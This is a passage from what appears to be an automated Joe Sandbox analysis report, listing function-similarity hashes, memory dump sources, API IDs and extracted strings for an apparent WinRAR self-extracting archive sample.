                          • Instruction ID: 9f33c09932a8880d08e496228cb1b3c3bbc40d4061ad18a8a860cf53ab773836
                          • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                          • Instruction Fuzzy Hash: 26614623B089D189FB01DF7599004FEBFB2B719798B958036CE9A57646CB3CE109DB20
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                          • Instruction ID: 7a5aa623b35441a0ef5af67c2c1ba361aa97a4a5501251ab1a72f7bb4c68cddb
                          • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                          • Instruction Fuzzy Hash: B8512373A185514BF728EF28E9047AEB751F784B64F848130DB4A47688DE3DE548EB10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                          • Instruction ID: ee9b6289616ad0c9c18ac360ddb359417b6d670ccadbfb58e1c91f0d060989f3
                          • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                          • Instruction Fuzzy Hash: 9931F6B2A089919BE708EE16E9506BFB7E1F744760F54C139DB4687B81DA3CE049D710
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                          • Instruction ID: b5115d6b47e9a8e6e21cd1de9ce31824c06f150425cb8fc1cd45c7c003f54089
                          • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                          • Instruction Fuzzy Hash: 0DF062B2B186958BEBA49F2DB84362AB7E1F708390F848439D68D83B14D63C94649F14
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                          • Instruction ID: 94ee75fbf8372b6dbbd146b92401b7087872a9b4377bd2537cee7306d8b2d39b
                          • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                          • Instruction Fuzzy Hash: 9EA00161908C52D0F685EB55BC60172A230BB51321B914071E40D420A8AF2CA409A220
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                          • API String ID: 3668304517-727060406
                          • Opcode ID: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                          • Instruction ID: 4312ce76ba22b5bbdc53648531f829c2018c0bbe9c36dfe813b8c9b807a3b93e
                          • Opcode Fuzzy Hash: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                          • Instruction Fuzzy Hash: 0441F776A05F0599FB40AB64E8513EAB3B9EB097A8F810236DE4C03768EF38D159D350
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 2565136772-3242537097
                          • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                          • Instruction ID: 3bb1567074ff2b236e2b91aa358205b4d990c4dd7d7aebd5c62ccf28f1da100b
                          • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                          • Instruction Fuzzy Hash: 16212E74A19E0385FA94BB15FC551B6E3B0AF457A0FD58434CD0E03AA4EF3CA48DA320
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: DXGIDebug.dll$UNC$\\?\
                          • API String ID: 4097890229-4048004291
                          • Opcode ID: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
                          • Instruction ID: 3dd6d0f5ccbd7cd21bbb90e8400adcf105faa9157a82f7338c8eac92da5e0d1f
                          • Opcode Fuzzy Hash: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
                          • Instruction Fuzzy Hash: FA12C062B08E4281FB10EB65E8401BEA372EB41BA8FA04139DA5D07BE9DF3DD54DD354
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                          • String ID: GETPASSWORD1$Software\WinRAR SFX
                          • API String ID: 431506467-1315819833
                          • Opcode ID: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                          • Instruction ID: 31d839f60718d1d85f4b64a4b156bc9e080ad507b28b8d06f11540fc7e302543
                          • Opcode Fuzzy Hash: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                          • Instruction Fuzzy Hash: E1B193A3F19B8285FB00AB64E8442BEA372AB453B4F904235DE5D27AD9DF3C9449D350
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                          • API String ID: 3215553584-2617248754
                          • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                          • Instruction ID: 114fb2661d217e82ddeced17b0bfdb0a6ccb0b5e4d65374038bc8da3b3bb931d
                          • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                          • Instruction Fuzzy Hash: 9D419D72A09F4589FB00DF25F8417EAB3A4EB193A8F80423ADE4C03B54EE38D029D354
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                          • String ID: STATIC
                          • API String ID: 781704138-1882779555
                          • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                          • Instruction ID: 9c485280b74869463a722ee89d5f99465869b34381ec6bf394a41a87de9c1651
                          • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                          • Instruction Fuzzy Hash: 59317225B08E4246FA60FB16BD547BBA3A1BB89BB4F844430DD4E07B55DE3CD80A9760
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                          • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                          • API String ID: 2721297748-1533471033
                          • Opcode ID: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                          • Instruction ID: b37cc863072cee8863aad8cb3f4fcd4f35d39dc269d2647d074feeb83ccdbdd8
                          • Opcode Fuzzy Hash: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                          • Instruction Fuzzy Hash: A581BE62B18E4285FB00EBA5E8501FEA372AB457B4F804531DE1E1769AEF38D50ED364
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Item$Text
                          • String ID: LICENSEDLG
                          • API String ID: 1601838975-2177901306
                          • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                          • Instruction ID: b90d93e0e118435a868af1a21e4852806334379815e8fe4e097faccac5cb1095
                          • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                          • Instruction Fuzzy Hash: 39416F25E08E5282FB54AB15FC5477BA3A1AB84BB4F944035DD0E07BA4CF7CE94DA324
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AddressProc$CurrentDirectoryProcessSystem
                          • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                          • API String ID: 2915667086-2207617598
                          • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                          • Instruction ID: 481db7f23ef0f799ba46e5a4c2b3acf78eb3e297d27e874ca05824e3156d7eb8
                          • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                          • Instruction Fuzzy Hash: 26313620A09F5680FA14AB15BC90177E3A2BF45BB4F958139CC5E433A9DF3CE949A320
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: $
                          • API String ID: 3668304517-227171996
                          • Opcode ID: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
                          • Instruction ID: f6a596e765f1bff88fcbac9055c77c421eae2df69dda72500acc7811f5297459
                          • Opcode Fuzzy Hash: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
                          • Instruction Fuzzy Hash: F9F1E562F15F4680FE40AB65E8441BEA362AB44BB8F915231CE1E177D9DF7CE188D360
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
